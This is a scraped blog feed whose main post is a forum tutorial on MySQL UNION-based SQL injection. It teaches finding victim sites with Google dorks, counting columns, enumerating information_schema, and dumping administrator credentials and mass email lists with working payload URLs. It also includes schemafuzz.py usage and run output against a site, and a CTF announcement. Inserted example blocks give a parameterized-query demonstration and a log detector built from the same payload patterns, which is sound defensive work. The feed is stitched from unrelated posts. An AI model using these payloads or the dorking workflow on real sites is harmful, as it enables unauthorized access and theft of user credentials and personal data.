First, if you find that I have written something that is wrong, please address it and I will fix it. There is one simple reason why I am writing this paper: there are so many simple SQL Injection questions that flood this board every day, and people just simply say things like “Learn to use the search function.”, “Google is your friend”, or some other completely non-helpful remark. If you aren't going to help someone, why reply at all? Just go on to another thread. That doesn't even bring up the number of private messages that I receive daily with questions related to SQL Injection; on a slow day I receive 1-2 private messages, on a normal day I will get up to 10 with questions about SQL, or even “What is your MSN/Yahoo/AIM/E-Mail, I need help.” Most of the time I do try to help as much as I can, but it does get old too. Well, enough ranting, here goes.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">2. Finding Vulnerable Sites</span></span></strong><br />
First you need to know what makes a site vulnerable to SQL Injection before you can find any vulnerable sites. <br />
<br />
The most common reason that a site is vulnerable to SQL Injection attacks is because the owner/coder didn't use the built-in MySQL function 'mysql_real_escape_string()'. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect of leaving it out is the simple Username/Password exploit ' or 1='1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.<br />
<br />
Well since I gave you a very basic reason for why certain sites are vulnerable we will move onto finding some vulnerable sites to play with.<br />
<br />
When talking about finding sites to inject you will hear the term “dork” a lot. This refers to a Google search term targeted at finding vulnerable websites. A “google dork” uses the built-in Google operators inurl: or allinurl: to search for websites that have certain strings in their URL or website address. An example of a google dork is inurl:index.php?id=1; entering this string into the Google search engine would return all of the sites in Google's cache with the string index.php?id=1 in their URL, e.g. http://www.example.com/index.php?id=1<br />
<br />
Here are some lists of “dorks†to use:<br />
http://www.hackforums.net/showthread.php?tid=76925<br />
http://www.hackforums.net/showthread.php?tid=71313<br />
http://go-blog.web.id/?p=3<br />
http://sql-injection-tools.blogspot.com/...hafiq.html<br />
<br />
Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL, e.g. index.php?id=1; id=1 is the GET parameter that 'gets' the row with id 1 from the SQL database. (Understand? Good.) <br />
<br />
So you are going to go to http://www.google.com, http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. The most common way to do this is to add a single quote (') after one of the integers in the URL.<br />
Example: http://www.example.com/index.php?id=1'<br />
<br />
Now there are many ways for a site to show you that it is vulnerable; the most common are errors like:<br />
<span style="background-color: #666666;">You have an error in your SQL Syntax</span><br />
<span style="background-color: #666666;">Warning: mysql_fetch_array():</span><br />
<span style="background-color: #666666;">Warning: mysql_fetch_assoc():</span><br />
<span style="background-color: #666666;">Warning: mysql_numrows():</span><br />
<span style="background-color: #666666;">Warning: mysql_num_rows():</span><br />
<span style="background-color: #666666;">Warning: mysql_result():</span><br />
<span style="background-color: #666666;">Warning: mysql_preg_match():</span><br />
<br />
If you receive any of these errors when you enter the ' after the number, then chances are the site is vulnerable to SQL Injection attacks to some extent. That isn't the only way to see if a site is vulnerable, though: the most overlooked sign is when a main part of the site simply disappears, such as a news article or a body of text on the main page. If this happens then it is likely that the site is vulnerable as well. <br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">3. Getting Number of Columns</span></span></strong><br />
After you find your vulnerable site, the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this; personally I use the <span style="color: orange;">ORDER BY</span> statement. There is also<span style="color: orange;"> GROUP BY</span>, which accomplishes the same thing, but ORDER BY is just habit. A lot of people use the string <span style="color: orange;">AND 1=0 </span>before their queries; most of the time this is just a waste of time to type out. The only time you need it is if you try <span style="color: orange;">ORDER BY 300--</span> and you don't receive an error; then you would add the AND 1=0 to your query. <br />
<br />
To find the number of columns you start with ORDER BY 1. If it doesn't error then you are good to go. Sometimes you will get a syntax error when doing ORDER BY 1, which is why it is important to start there; if you get the syntax error your best bet is to move on to another site. If you don't get an error, I always go to ORDER BY 300 to see if I get an error there. Sometimes you could go on for years and never get an error, but there can't be 300 columns in the database, so you should always get an error there. After getting the error on 300 it is up to you how you want to find the number of columns; personally I jump around out of habit, and I usually do something like this: <br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 1--</span></span><br />
no error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 300--</span></span><br />
error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 10--</span></span><br />
error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 5--</span></span><br />
no error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 6--</span></span><br />
error<br />
After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn't error on anything below ORDER BY 5.<br />
<br />
Note on comments: Comments are not always necessary when injecting a website, although sometimes they are. By comments I am referring to the -- at the end of the URL.<br />
Possible comments to use are --, /*, /**/, or simply nothing at the end.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">4. Getting MySQL Version</span></span></strong><br />
Now that we have the number of columns, you are going to want to get the version of the database you are working on. This is an important step, because on any version lower than 5 you will have to guess table names and column names. I don't recommend working on a database lower than version 5 for beginners; you should get acquainted with SQL Injection first. Before we can get the version you have to find a visible column number. This is where the Injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don't understand that these are two completely different SQL statements; the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site. <br />
For example: <span style="background-color: #444444;">http://www.example.com<span style="color: #9fc5e8;">/index.php?id=1</span></span><br />
What this URL is telling the database is <span style="background-color: #20124d;">SELECT * FROM <span style="color: magenta;">'tablenamehere'</span> WHERE id=<span style="color: magenta;">'1'</span>;</span><br />
<br />
Now when we add our UNION into that URL we are adding two SQL statements together. Since our example website has 5 columns, this is what our query would look like:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1<span class="Apple-style-span" style="color: yellow;">+UNION+SELECT+1,2,3,4,5--</span></span><br />
<br />
The website should return normally after doing this. If it doesn't, and it tells you something like “Forbidden” or some other error, then the website doesn't support union statements and you need to move on. If it doesn't error then add a negative sign after the equals sign, like this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=<span class="Apple-style-span" style="color: yellow;">-</span>1+<span class="Apple-style-span" style="color: yellow;">UNION+SELECT+1,2,3,4,5--</span></span><br />
<br />
There is a reason for this people, I've been asked many times why you do this, the reason is when you send this query to the database you are sending something like: <br />
<span style="background-color: #20124d;">SELECT * FROM <span style="color: magenta;">'tablenamehere' </span>WHERE id=<span style="color: magenta;">'-1'</span> UNION SELECT <span style="color: magenta;">1,2,3,4,5 </span></span><br />
<br />
There isn't a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data's place. Those are our visible columns. For our example we'll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways either <span style="color: orange;">@@version</span> or <span style="color: orange;">version()</span>. To use them do this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">@@version</span>,3,4,5--</span><br />
or<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">concat(version())</span>,3,4,5--</span><br />
<br />
If you get an error like “Illegal mix of collations” when using @@version, you simply have to convert it to latin1 from UTF8, like so:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">convert(@@version using latin1)</span>,3,4,5--</span><br />
<br />
NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5-- will not work.<br />
<br />
Well, if it worked you now know the version of the MySQL database in use. You will see something like 5.0.13-log, or 4.0.0.1-delta; there are countless versions and types, but all we need to focus on is the first number. If it is 5 then we are good to go; if it is 4 and you are new, you should move on.<br />
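Added example, not from the tutorial: the concatenated lookup the text describes (SELECT * FROM table WHERE id=input) rebuilt over an in-memory SQLite table with five columns like the tutorial's example site, next to a parameterized version of the same lookup. The inputs from sections 3 and 4 (ORDER BY n, -1 UNION SELECT 1,2,3,4,5) are run through both so the "error / no error" signal and its disappearance under parameter binding can be observed; table name, columns and rows are constructed, and SQLite stands in for MySQL so it runs offline.<br />

```python
"""Added example (not the tutorial's code): string-concatenated lookup versus
parameterized lookup over a constructed five-column SQLite table."""
import sqlite3

# Constructed sample data: a five-column "news" table, matching the
# tutorial's "5 columns" example site.
SAMPLE_ROWS = [
    (1, "First post", "hello", "admin", "2009-07-14"),
    (2, "Second post", "world", "editor", "2009-07-15"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT)"
    )
    con.executemany("INSERT INTO news VALUES (?,?,?,?,?)", SAMPLE_ROWS)
    return con


def vulnerable_lookup(con, user_input):
    """String concatenation, as on the vulnerable site the tutorial describes.
    Returns (rows, error); error is None when the statement ran."""
    sql = "SELECT * FROM news WHERE id=" + user_input
    try:
        return con.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def safe_lookup(con, user_input):
    """Parameter binding: the input is compared as a value and never parsed
    as SQL. Same return shape as vulnerable_lookup."""
    try:
        rows = con.execute("SELECT * FROM news WHERE id=?", (user_input,)).fetchall()
        return rows, None
    except sqlite3.Error as exc:
        return [], str(exc)


def compare(con, user_input):
    """Run one input through both lookups and summarise what the page would
    show: the tutorial's "error" versus "no error" signal, or a row count."""
    def summarise(rows, err):
        if err is not None:
            return "error: " + err
        return "rows: %d" % len(rows)
    return {
        "vulnerable": summarise(*vulnerable_lookup(con, user_input)),
        "safe": summarise(*safe_lookup(con, user_input)),
    }


if __name__ == "__main__":
    db = make_db()
    # ORDER BY 5 succeeds, ORDER BY 6 errors (five columns); UNION SELECT with
    # five placeholders returns them as a row, with four it errors. The
    # parameterized lookup returns no rows and no error for every payload.
    for payload in ["1", "1 ORDER BY 5--", "1 ORDER BY 6--",
                    "-1 UNION SELECT 1,2,3,4,5--", "-1 UNION SELECT 1,2,3,4--"]:
        print(repr(payload), compare(db, payload))
```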
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">5. Getting Database Names</span></span></strong><br />
I haven't seen this covered in any papers on SQL Injection, so I will include it because it is an important part of SQL Injection. Novice SQL Injectors: have you ever started to inject a website and then found no useful data, such as usernames/passwords? Most likely that is because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In MySQL versions 5 and higher there will always be a database named 'information_schema' and most of the time a database named 'test'; neither of these holds data that you will need to know, but the information_schema database is the reason that injecting v5+ databases is so easy. <br />
<br />
To get list of databases do this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span style="color: orange;">group_concat(schema_name)</span>,3,4,5+ FROM+<span style="color: orange;">information_schema.schemata--</span></span><br />
Now, where you saw the database version pop up earlier, you will see the names of all of the different databases. We will say for our example we got back something like this:<br />
<span style="background-color: #20124d; color: red;">information_schema,exampledb,exampledb2,test</span><br />
<br />
If you want to know which database is in use right now, do this:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 <strong>UNION SELECT</strong> 1,<span style="color: orange;">concat(database())</span>,3,4,5--</span><br />
We'll say we got back 'exampledb'. <br />
<br />
From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:<br />
<br />
<span style="background-color: #666666;">Databases:</span><br />
<span style="background-color: #666666;"><br />
</span><br />
<span style="background-color: #666666;">Tables:</span><br />
<span style="background-color: #666666;"><br />
</span><br />
<span style="background-color: #666666;">Columns:</span><br />
<br />
So that I can quickly copy and paste in. In my opinion this is a good habit to get into.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">6. Getting Database User</span></span></strong><br />
Not really necessary but good to know use user():<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">concat(user())</span>,3,4,5--</span><br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">7. Getting Table Names</span></span></strong><br />
I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.<br />
<br />
<strong>To get table names of the current database:</strong><br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(table_name)</span>,3,4,5 from </span><span style="background-color: #444444;"><span style="color: orange;">information_schema.tables</span> WHERE <span style="color: orange;">table_schema=database()--</span></span><br />
<br />
You will see a list of table names come out, for our example we will say we got:<br />
<span style="background-color: #444444; color: red;">news, images, ads, links</span><br />
<br />
Wow, that looks useful, huh? That is information we can get from just looking at the website, so now it's time to get tables from the other database we found earlier, 'exampledb2'. This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name. <br />
So we convert exampledb2 to 6578616d706c65646232. Always remember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it needs to decode it to get the right name. So our database name ends up being 0x6578616d706c65646232. <br />
<br />
<strong>Online text-to-hex converters:</strong><br />
http://www.motobit.com/util/binary-file-...string.asp<br />
http://www.string-functions.com/string-hex.aspx<br />
http://home2.paulschou.net/tools/xlate/<br />
<br />
Now for the query:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(table_name)</span>,3,4,5 FROM <span style="color: orange;">information_schema.tables</span> WHERE <span style="color: orange;">table_schema=<span style="color: red;">0x6578616d706c65646232</span>--</span></span><br />
Notice we change<span style="color: black;"> </span><span style="color: red;">'database()'</span> to our hexed database name <span style="color: red;">'0x6578616d706c65646232'</span> <br />
<br />
For our example we'll say we got back:<br />
<span style="background-color: #666666; color: red;">newsletter, members, administrators</span><br />
<br />
That's the good stuff, normally you wouldn't have found this information and just moved onto another site. <br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">8. Getting Column Names</span></span></strong><br />
This is exactly like getting table names you just change <span style="color: orange;">table_name</span> to <span style="color: orange;">column_name</span> and <span style="color: orange;">information_schema.tables</span> to <span style="color: orange;">information_schema.columns</span>:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(column_name)</span>,3,4,5 FROM <span style="color: orange;">information_schema.columns</span> WHERE <span style="color: orange;">table_schema=database()--</span></span><br />
<br />
That's gonna give you every column name on the database, but you don't want the columns for 'exampledb', remember, because there wasn't any useful info in there; you want just the column names from 'exampledb2' because there was member info and admin info in that database. So now you open your Text-to-hex again and hex your database again, so 'exampledb2' becomes '0x6578616d706c65646232'<br />
<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(column_name)</span>,3,4,5 from <span style="color: orange;">information_schema.columns</span> WHERE <span style="color: orange;">table_schema= 0x6578616d706c65646232--</span></span><br />
That will only return the column names from that selected database. We'll say we got back:<br />
<span style="background-color: #666666; color: red;">email, username, password, first_name, last_name</span><br />
<br />
If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name. <br />
To get this you would do:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,<span style="color: orange;">group_concat(<span style="color: red;">username</span>,0x3a,<span style="color: red;">password</span>,0x3a,<span style="color: red;">email</span>,0x3a,<span style="color: red;">first_name</span>,0x3a,<span style="color: red;">last_name</span>) </span>,3,4,5 FROM <span style="color: orange;"><span style="color: red;">exampledb2.administrators</span>--</span></span><br />
<br />
0x3a is the hex value for a colon ':', so that you can easily separate the information. Sometimes this won't work though; sometimes you have to hex the databasename.tablename (not a lot, but sometimes), so in that case it would be:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,<span style="color: orange;">group_concat(<span style="color: red;">username</span>,0x3a,<span style="color: red;">password</span>)</span>,3,4,5 from <span style="color: red;">0x6578616d706c656462322e61646d696e6973747261746f7273</span>--</span><br />
Which will then give you what you're looking for.<br />
<br />
<strong><span class="Apple-style-span" style="font-size: x-large;"><span class="Apple-style-span" style="color: orange;">9. LIMIT What is it and why do I need to know it?</span></span></strong><br />
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just won't display them all in one go? Well, this is where you need the LIMIT statement. <br />
<br />
For our example we will say we want the emails from the exampledb2.newsletter table; the only column in that table is 'email'. It will probably never be that easy, but hey, this is an example, right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and one half cut off, like random.douchebag@gma, so how do we get the rest of the 480 emails? This is where your perseverance will come into play; if you want it that bad you would use the LIMIT statement to get them. Since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:<br />
<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--</span><br />
<br />
Note when using limit: you can't use group_concat(); it will error. Drop the group and just use concat().<br />
<br />
The 9999999 can be any number higher than the row count in the database; I just use that because it is easy. You would do this, increasing your number by 1, until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--, limit 23,9999999--, limit 24,9999999--<br />
Yes, it will take a long time to do this. There are tools used to dump databases though; the most commonly used is SQLI Helper, though this tool is flawed too because it won't increase the last number when limiting if needed. <br />
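Added example, not part of the tutorial: a small log detector for the request sequence walked through in sections 2 to 9 (quote probe, ORDER BY column counting, UNION SELECT placeholders, @@version, information_schema reads, group_concat, 0x-hex-encoded names, LIMIT paging), written from the defender's side. It parses Apache combined-format access-log lines, URL-decodes each query string, flags which steps it matches, and decodes the hex literals so an analyst can see which database or table a request named; the log lines are constructed samples whose paths mirror the tutorial's URLs.<br />

```python
"""Added example (not the tutorial's code): flag the tutorial's probing steps in
access-log lines and decode 0x-hex-encoded names. All log data is constructed."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format sample: 10.0.0.5 runs the tutorial's
# sequence against /index.php?id=; 10.0.0.9 makes an ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jul/2009:22:38:01 -0700] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:38:09 -0700] "GET /index.php?id=1' HTTP/1.1" 200 870 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:38:15 -0700] "GET /index.php?id=1%20ORDER%20BY%20300-- HTTP/1.1" 200 870 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:38:20 -0700] "GET /index.php?id=1%20ORDER%20BY%205-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:38:31 -0700] "GET /index.php?id=-1+UNION+SELECT+1,@@version,3,4,5-- HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:39:02 -0700] "GET /index.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5+FROM+information_schema.tables+WHERE+table_schema=0x6578616d706c65646232-- HTTP/1.1" 200 5010 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:39:40 -0700] "GET /index.php?id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5+from+0x6578616d706c656462322e61646d696e6973747261746f7273-- HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2009:22:40:12 -0700] "GET /index.php?id=-1+union+select+1,concat(email),3,4,5+from+exampledb2.newsletter+limit+21,9999999-- HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jul/2009:22:41:00 -0700] "GET /index.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# One indicator per tutorial step, matched against the URL-decoded query string.
INDICATORS = [
    ("quote_probe", re.compile(r"=\d+'\s*$")),                              # section 2: id=1'
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),            # section 3
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),   # section 4
    ("version_fingerprint", re.compile(r"@@version|\bversion\(\)", re.I)),  # section 4
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),    # sections 5-8
    ("group_concat", re.compile(r"\bgroup_concat\(", re.I)),                # sections 5-8
    ("limit_paging", re.compile(r"\blimit\s+\d+\s*,\s*\d+", re.I)),         # section 9
    ("sql_comment_tail", re.compile(r"(?:--|/\*)\s*$")),                    # trailing comment
]
# 8+ hex digits (4+ bytes): encoded names, not the 0x3a colon separator.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{8,})\b")


def decode_hex_literals(text):
    """Return the printable-ASCII strings hidden in 0x... literals (hexed names)."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:
            continue  # odd length cannot be a whole byte string
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def analyze_request(path):
    """Decode one request's query string and report which tutorial steps it matches."""
    query = unquote_plus(path.partition("?")[2])
    hits = [name for name, rx in INDICATORS if rx.search(query)]
    return {"query": query, "indicators": hits, "decoded_hex": decode_hex_literals(query)}


def scan_log(text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyze_request(m.group("path"))
        if result["indicators"] or result["decoded_hex"]:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"), **result})
    return findings


def score_by_client(findings):
    """Distinct indicator types per client IP. A lone ORDER BY may be noise;
    column counting followed by UNION SELECT and information_schema reads from
    one address is the whole sequence the tutorial describes."""
    per_ip = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).update(f["indicators"])
    return {ip: sorted(kinds) for ip, kinds in per_ip.items()}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["indicators"], f["decoded_hex"])
    print(score_by_client(scan_log(SAMPLE_LOG)))
```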
<br />
<strong>10. End Notes</strong><br />
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note, SQL Injection can be fun to do, and defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.<br />
[quote]<br />
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done. <br />
[/quote]<br />
<br />
The Ten Commandments of Computer Ethics by the Computer Ethics Institute:<br />
1. Thou shalt not use a computer to harm other people.<br />
2. Thou shalt not interfere with other people's computer work.<br />
3. Thou shalt not snoop around in other people's computer files.<br />
4. Thou shalt not use a computer to steal.<br />
5. Thou shalt not use a computer to bear false witness.<br />
6. Thou shalt not copy or use proprietary software for which you have not paid.<br />
7. Thou shalt not use other people's computer resources without authorization or proper compensation.<br />
8. Thou shalt not appropriate other people's intellectual output.<br />
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.<br />
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.<br />
<br />
If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial. <br />
<br />
Don't forget to RATE my thread. 5 Stars would be nice.<br />
Last minute addition:<br />
Definitive SQL E-Book Collection<br />
Contents:<br />
The Visibooks Guide to MySQL Basics<br />
Sybex - Mastering MySQL 4<br />
Sams - Teach Yourself Mysql in 10 Minutes<br />
Sams - MySQL Database Design and Tuning<br />
Sams - MySQL Tutorial<br />
Sams - MySQL Phrasebook - Essential Code and Commands<br />
Sams - MySQL Crash Course<br />
Sams - MySQL Certification Study Guide<br />
Sams - MySQL 2nd Edition<br />
Peachpit Press - Visual Quickstart Guide -MySQL<br />
O'Reilly - MySQL Pocket Reference<br />
O'Reilly - MySQL in a Nutshell<br />
O'Reilly - MySQL Cookbook<br />
O'Reilly - MySQL and mSQL<br />
O'Reilly - Managing and Using MySQL<br />
O'Reilly - High Performance MySQL<br />
MySQL Press - MySQL Administrator's Guide and Language Reference<br />
McGraw Hill - MySQL Essential Skills<br />
<br />
Download Link<br />
<br />
Code:<br />
#!/usr/bin/laden -w<br />
use Weapons::Of qw(Mass Destruction);<br />
if ( $home eq "Cave M_of_Nowhere") {<br />
print "I HAZ DE URANIUM\n";<br />
}<br />
<br />
<a href="http://www.hackforums.net/showthread.php?tid=94738" target="_blank">http://www.hackforums.net/showthread.php?tid=94738</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-1058177582782248482009-06-02T20:14:00.000-07:002009-06-02T20:17:26.323-07:00LAMPSecurity.org Capture the Flag ExerciseHello,<br /><br />I'm happy to announce that the second installment (cryptically called<br />CTF5) of LAMPSecurity.org's capture the flag series of exercises is now<br />available. This edition is novel in that it includes a 0-day exploit<br />that can be used (indirectly) to gain root. This is a training exercise<br />released in support of the educational mission of LAMPSecurity.org. The<br />exercise is modeled after many of the exercises that are presented in<br />expensive commercial training courses, except it's free, of course.<br />Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag<br />exercise consists of a full, vulnerable, virtual machine (VMWare's free<br />Player is required). This allows users to explore vulnerabilities at<br />every level of the LAMP stack. The first exercise includes an "attack"<br />VM as well, with tools pre-installed (where possible). It also includes<br />over 60 pages of step-by-step documentation so no prior experience is<br />necessary (although the documentation only outlines one of several<br />routes to root compromise). The exercise is designed to educate system<br />administrators and developers on some common dangers and<br />mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications.<br />Further details, including the documentation, are available at<br /><a href="http://lampsecurity.org/capture-the-flag-5" target="_blank">http://lampsecurity.org/capture-the-flag-5</a>. 
The vulnerable virtual<br />machine and attack image are available from SourceForge at<br /><a href="https://sourceforge.net/projects/lampsecurity/" target="_blank">https://sourceforge.net/projects/lampsecurity/</a>. Constructive feedback is<br />of course welcome. Thank you and enjoy.<br /><br />- -- <br />Justin C. Klein Keane<br />http://www.MadIrish.net<br />http://www.LAMPSecurity.orgUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-69250240629956711882009-05-27T13:12:00.000-07:002009-08-23T13:30:28.692-07:00schemafuzz.py by rsauron<font color=royalblue>schemafuzz.py -h</font><br />Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com<br /> Modes:<br /> Define: --dbs Shows all databases user has access too. MySQL v5+<br /> Define: --schema Enumerate Information_schema Database. MySQL v5+<br /> Define: --full Enumerates all databases information_schema table MySQL v5+<br /> Define: --dump Extract information from a Database, Table and Column. MySQL v4+<br /> Define: --fuzz Fuzz Tables and Columns. MySQL v4+<br /> Define: --findcol Finds Columns length of a SQLi MySQL v4+<br /> Define: --info Gets MySQL server configuration only. MySQL v4+<br /><br /> Required:<br /> Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /><br /> Mode dump and schema options:<br /> Define: -D "database_name"<br /> Define: -T "table_name"<br /> Define: -C "column_name,column_name..."<br /><br /> Optional:<br /> Define: -p "127.0.0.1:80 or proxy.txt"<br /> Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt<br /> Define: -r row number to start at<br /> Define: -v Verbosity off option. 
Will not display row #'s in dump mode.<br /><br /> Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /> Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /> Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200<br /> Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password<br /> Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt<br /> Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"<br /><br /><br /><font color=royalblue>schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 <font color=yellow>--findcol </font></font><br /><br />|---------------------------------------------------------------|<br />| rsauron[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table & Column Fuzzer |<br />| Usage: schemafuzz.py [options] |<br />| -h help darkc0de.com |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://www.ayamitiklembu/news.php?id=1--<br />[+] Evasion Used: "+" "--"<br />[+] 23:35:53<br />[-] Proxy Not Given<br />[+] Attempting To find the number of columns...<br />[+] Testing: 0,1,2,3,<br />[+] <font color=orange>Column Length is: 4<br />[+] Found null column at column #: 1<br />[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--<br />[+] darkc0de URL: 